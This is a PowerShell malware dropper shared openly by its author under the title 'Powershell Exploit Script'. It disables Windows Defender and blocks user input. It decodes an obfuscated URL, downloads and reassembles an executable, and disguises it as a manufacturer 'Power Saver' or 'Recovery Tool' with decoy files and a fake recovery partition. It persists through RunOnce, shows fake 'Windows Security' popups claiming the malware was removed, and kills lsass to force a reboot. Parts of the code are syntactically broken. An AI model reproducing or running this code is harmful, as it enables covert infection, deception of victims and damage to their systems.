Powershell Exploit Script

### My First Powershell script making it public because I no longer write in powershell by xplosive###


if (Test-Path "$env:TEMP\ParamsTest\Defender.garbage") {
$Defender = 1
} else {
$Defender = 0
} elseif (Test-Path "$env:TEMP\ParamsTest\EnableOverride.garbage") {
$EnableOverride = 1
} else {
$EnableOverride = 0
} elseif (Test-Path "$env:TEMP\ParamsTest\EnablePayload.garbage") {
$EnablePayload = 1
$PayloadOptions = False
} else {
$EnablePayload = 0
}
elseif (Test-Path "$env:TEMP\ParamsTest\DriveCreation.garbage")  {
$DriveCreation = 1
} else {
$DriveCreation = 0


if (Test-Path "$env:TEMP\TestPathHere.txt") {
$SetNamesTest = 1
}
$Manu = Gwmi Win32_ComputerSystem | Select-Object -ExpandProperty Manufacturer
$CurrentUser = $env:USERNAME
$Current = $env:USERNAME
$RandText = Get-Random
$userInput::BlockInput($true)
## Disables Monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
## Sets exection policy
$GetPolicy = Get-ExecutionPolicy
if($GetPolicy -notmatch 'Unrestricted') {
Set-ExecutionPolicy Unrestricted
}
## Permission set for auto run
$acl = Get-Acl "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule ("$CurrentUser","FullControl","Allow")
$acl.SetAccessRule($rule)
$acl | Set-Acl -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
## Disables Windows Defender
IF(!(Test-Path $RegPath))

 {
   New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Force
   New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value "1"
   -PropertyType DWORD -Force }
ELSE {
   New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value "1"
   -PropertyType DWORD -Force
}
##Converts Payload link to text visits the link
##Then downloads the text converts to a zip
## Opens zip converts three parts of text inside
## to an exe and saves it for later
$LeftData1 = "5423466743743535a4e66585656555"
$LeftData2 = "1585a596c6d62657d4232647939636"
$LeftData3 = "76744603243336638397c477642336"
$Strung = Get-Variable LeftData* | select-Object -ExpandProperty value
$ArrayBack1  = [String]::Join('',$Strung)
$ArrayBack2  = $ArrayBack1 -split ""
[array]::Reverse($ArrayBack2)
$ArrayBack3 = $ArrayBack2 -join ''
$PassArray = ""
$ArrayBack3 -split '(.{2})' |%{ if ($_ -ne "") { $PassArray+=[CHAR]([CONVERT]::toint16("$_",16))  }}
$ArrayText1 = $PassArray[0..14]  + "=" -join ""
$ArrayText2 = $PassArray[15..29] + "=" -join ""
$ArrayText3 = $PassArray[30..45] + "="  -join ""
$ConvertPart3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText1"))
$ConvertPart2 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText2"))
$ConvertPart1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText3"))
$ArrayReturn = Get-Variable ConvertPart* | select-Object -ExpandProperty value
$ArrayBackA1  = [String]::Join('',$ArrayReturn)
$ArrayBackA2  = $ArrayBackA1 -split ""
[array]::Reverse($ArrayBackA2)
$Zshark = $ArrayBackA2 -join ''
### Converts payload to zip
$BaseProgram = Invoke-WebRequest -Uri $Zshark -UseBasicParsing
$ConvertedPayload = [Convert]::FromBase64String($BaseProgram)
$Random = Get-Random
$ZipName = "TEMPAPP " + $Random
$UnzipName = "TEMPDATA " + $Random
New-Item "$Env:TEMP\$ZipName.zip" -Type File -Force
[io.file]::WriteAllBytes("$Env:TEMP\$ZipName.zip" , $ConvertedPayload)
Expand-Archive $env:TEMP\$ZipName.zip  -DestinationPath $env:TEMP\$UnzipName\
Remove-Item $env:TEMP\*TEMPAPP* -Force -Recurse -ErrorAction SilentlyContinue
## Converts Text
$Content1 = Get-Content $env:TEMP\$UnzipName\A.doc -Raw
$Content2 = Get-Content $env:TEMP\$UnzipName\B.doc -Raw
$Content3 = Get-Content $env:TEMP\$UnzipName\C.doc -Raw
##Reverses Payload Text
$arr1 = $Content1 -split ""
[array]::Reverse($arr1)
$REV1 = $arr1 -join ''
$arr2 = $Content2 -split ""
[array]::Reverse($arr2)
$REV2 = $arr2 -join ''
$arr3 = $Content3 -split ""
[array]::Reverse($arr3)
$REV3 = $arr3 -join ''
#Joins Payload and convets to exe
$ContentComb = Get-Variable REV* -ValueOnly
$Join = ''
$ContentComb1  = [String]::Join($Join,$ContentComb)
$ConvertedText = [Convert]::FromBase64String($ContentComb1)
#Folder Naming Scheme
$ProgramName = $Manu + " Power Saver"
$ProgramName1 = $Manu + " Recovery Tool"
$VerNum = Get-Random -InputObject "Alpha ", "Beta ", "Public " , "Final "
$VerNumMatch1 = Get-Random -Maximum 10
$VerNumMatch2 = Get-Random -Maximum 6
$FileSize1 = Get-Random -Maximum 50000
$FileSize2 = Get-Random -Maximum 50000
$FileSize3 = Get-Random -Maximum 10000
$FileSize4 = Get-Random -Maximum 9000
$VersionFolder = $VerNum + $VerNumMatch1 + "." + $VerNumMatch2
$DriveName = $Manu + " Recovery Partition"
#Makes it look like a manufacter product
# Mean't for the computer
New-Item "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe" -Type File -Force
[io.file]::WriteAllBytes("C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe" , $ConvertedText)
##Creates Fake files
remove-item "$env:TEMP\*TEMPDATA*" -Force -Recurse -ErrorAction SilentlyContinue
New-Item "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolde\CrashReports" -Type Directory -Force
fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\NetXServiceFile.dll" $FileSize1
fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\PowerMeterF.dll" $FileSize2
fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.conf" $FileSize3
fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$Manu Diagnose.xml " $FileSize4
##Creates Fake Recovery Drive
$DriveRandomLetter = Get-Content -Path "$env:APPDATA\FolderLetter\FolderLetter.txt"
#Tests to see if a recovery drive has already been made
if ($DriveRandomLetter -ne $null) {
Resize-Partition -DriveLetter C -Size ((Get-Partition -DriveLetter C).Size - 20MB)
$DiskNum = get-partition -DriveLetter C | get-disk | Select-Object -ExpandProperty number
New-Partition -DiskNumber $DiskNum -UseMaximumSize -DriveLetter $DriveRandomLetter | Format-Volume -Force
Set-Volume -DriveLetter $DriveRandomLetter -NewFileSystemLabel "$DriveName"
$FileHere1 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
New-Item $FileHere1  -Type File -Force
$FileHere2 = "$DriveRandomLetter" + ":\DataTest\Test.Data"
New-Item $FileHere2 -Type File -Force
$FileHere3 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
[io.file]::WriteAllBytes($FileHere3 , $ConvertedText)
$FileHere4 = "$DriveRandomLetter" + ":\RecoveryXd4.dll"
fsutil file createnew $FileHere4 $FileSize1
$FileHere5 = "$DriveRandomLetter" + ":\RecoverList.Xmll"
fsutil file createnew $FileHere5  $FileSize2
$FileHere6 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.conf"
fsutil file createnew $FileHere6 $FileSize3
$FileHere7 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$Manu Recover.xml"
fsutil file createnew $FileHere7 $FileSize4
$FileHere8 = "$DriveRandomLetter" + ":\DataTest"
$file8 = Get-Item $FileHere8
$file8.Attributes = 'System'
}elseif($DriveRandomLetter -eq $null) {
$WH200 = New-Object -ComObject Wscript.Shell
$WH200.Popup("We Are Going To Create A Recovery Drive Please Click Okay To Continue",0,"Windows Security",0x0)
New-item "$env:APPDATA\FolderLetter\FolderLetter.txt" -type file -force
$DriveRandom = ls function:[d-z]: -n | ?{ !(test-path $_) } | random
$DriveLetterHere = $DriveRandom
Add-Content "$env:APPDATA\FolderLetter\FolderLetter.txt" $DriveLetterHere
Resize-Partition -DriveLetter C -Size ((Get-Partition -DriveLetter C).Size - 20MB)
$DiskNum = get-partition -DriveLetter C | get-disk | Select-Object -ExpandProperty number
New-Partition -DiskNumber $DiskNum -UseMaximumSize -DriveLetter $DriveLetterHere | Format-Volume -Force
Set-Volume -DriveLetter $DriveLetterHere -NewFileSystemLabel "$DriveName"
$FileHere9 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
New-Item $FileHere9 -Type File -Force
$FileHere10 = "$DriveLetterHere" + "\DataTest\Test.Data"
New-Item $FileHere10 -Type File -Force
$FileHere11 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
[io.file]::WriteAllByte($FileHere11 , $ConvertedText)
$FileHere12 = "$DriveLetterHere" + "\RecoveryXd4.dll"
fsutil file createnew $FileHere12 $FileSize1
$FileHere13 = "$DriveLetterHere" + "\RecoverList.Xml"
fsutil file createnew $FileHere13 $FileSize2
$FileHere14 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.conf"
fsutil file createnew $FileHere14 $FileSize3
$FileHere15 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$Manu Recover.xml"
fsutil file createnew $FileHere15 $FileSize4
$FileHere16 = "$DriveLetterHere" + "\DataTest"
$file16 = Get-Item $FileHere16
$file16.Attributes = 'System'
}
$userInput::BlockInput($true)
## Other Payload run next boot If first payload failed
$RegPath1  = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
$RegName1  = "Run"
$RegValue1 = "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe"
IF(!(Test-Path $RegPath1))
 {
   New-Item -Path $RegPath1 -Force
   New-ItemProperty -Path $RegPath1 -Name $RegName1 -Value $RegValue1
   -PropertyType DWORD -Force }
ELSE {
   New-ItemProperty -Path $RegPath1 -Name $RegName1 -Value $RegValue1
   -PropertyType DWORD -Force
}
##Fixes file names
If ($SetNamesTest -eq 1){
Get-ChildItem  -Path *.exe -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
Get-ChildItem  -Path *.txt -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
Get-ChildItem  -Path *.png -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
Get-ChildItem -Path *.zip -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
Get-ChildItem -Path *.rar -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
#Resets set names variable
Remove-Item -Path "$env:TEMP\TestPathHere.txt" -Force
}
Start-Sleep -Seconds 10
##Hides installed file
$file = Get-Item "$env:USERPROFILE\Microsoft Apps"
$file.Attributes = 'Hidden'
$file4 = Get-Item "Z:\$Current\"
$file4.Attributes = 'Hidden'
#Waits for payload to install then disables user acess to autorun
$acl1 = Get-Acl "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
$rule1 = New-Object System.Security.AccessControl.RegistryAccessRule ("$CurrentUser","ReadAcess","Allow")
$acl1.SetAccessRule($rule1)
$acl1 | Set-Acl -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
& "Z:\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
$WH1 = New-Object -ComObject Wscript.Shell
$userInput::BlockInput($false)
##Fake Completion Message
$WH1.Popup("Success Windows Defender Was Enabled And Powershell Removed The Malware, There Will Be A Log File On Your Desktop, Your Computer May Reboot Now",0,"Windows Security",0x0)
## Creates log file
$InfoHereNow = Get-CimInstance Win32_OperatingSystem | Select Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName
New-Item "C:\Users\$CurrentUser\Desktop\Removal Log.txt" -type file -force
Add-content "C:\Users\$CurrentUser\Desktop\Removal Log.txt" $InfoHereNow
Add-content "C:\Users\$CurrentUser\Desktop\Removal Log.txt" $FakeLog
##Reboots Computer
$GetProcessID = Get-Process lsass | select-Object -ExpandProperty Id
Stop-Process -Id $GetProcessID -force
##Exits
exit